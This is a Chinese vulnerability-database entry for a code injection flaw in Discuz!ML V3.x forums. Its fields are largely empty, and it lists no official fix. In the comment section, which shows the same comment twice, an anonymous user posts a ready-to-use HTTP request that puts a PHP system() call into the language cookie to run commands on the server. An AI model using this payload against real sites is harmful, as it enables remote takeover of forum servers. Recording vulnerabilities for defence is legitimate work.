Discuz!ML V3.X 代码注入

基本字段

漏洞编号：: SSV-98019

披露/发现时间：: 未知

提交时间：: 2019-07-11

漏洞等级：

漏洞类别：: 代码执行

影响组件：: Discuz!ML
(<= 3.x)

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

原创

来源

https://mp.weixin.qq.com/s/5Zl3Jve4eblNIXh30t469w

漏洞详情

贡献者共获得 0KB

共 0 兑换了

PoC

暂无 PoC

参考链接

漏洞状态

2019/07/11 漏洞已提交，审核通过

解决方案

临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

mengmeng 关注了该漏洞
匿名参与了评论

生命线

发现/披露了漏洞
匿名

2019-07-11 提交了漏洞
Knownsec

2019-07-11 提交补充了漏洞详情

相关漏洞

Discuz!ML V3.X 代码注入

全部评论 (1)

匿名 2019-07-14

漏洞poc： GET /forum.php HTTP/1.1 Host: test.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: Z3T2_2132_saltkey=UoA95q3Q; Z3T2_2132_language=en'.system("whoami").'; Z3T2_2132_lastvisit=1562765759; Z3T2_2132_sid=fENq7z; Z3T2_2132_lastact=1562769440%09index.php%09; Z3T2_2132_sendmail=1; Z3T2_2132_onlineusernum=1 Upgrade-Insecure-Requests: 1
回复 3 0
1F

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

匿名 2019-07-14

漏洞poc： GET /forum.php HTTP/1.1 Host: test.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: Z3T2_2132_saltkey=UoA95q3Q; Z3T2_2132_language=en'.system("whoami").'; Z3T2_2132_lastvisit=1562765759; Z3T2_2132_sid=fENq7z; Z3T2_2132_lastact=1562769440%09index.php%09; Z3T2_2132_sendmail=1; Z3T2_2132_onlineusernum=1 Upgrade-Insecure-Requests: 1

回复 3 0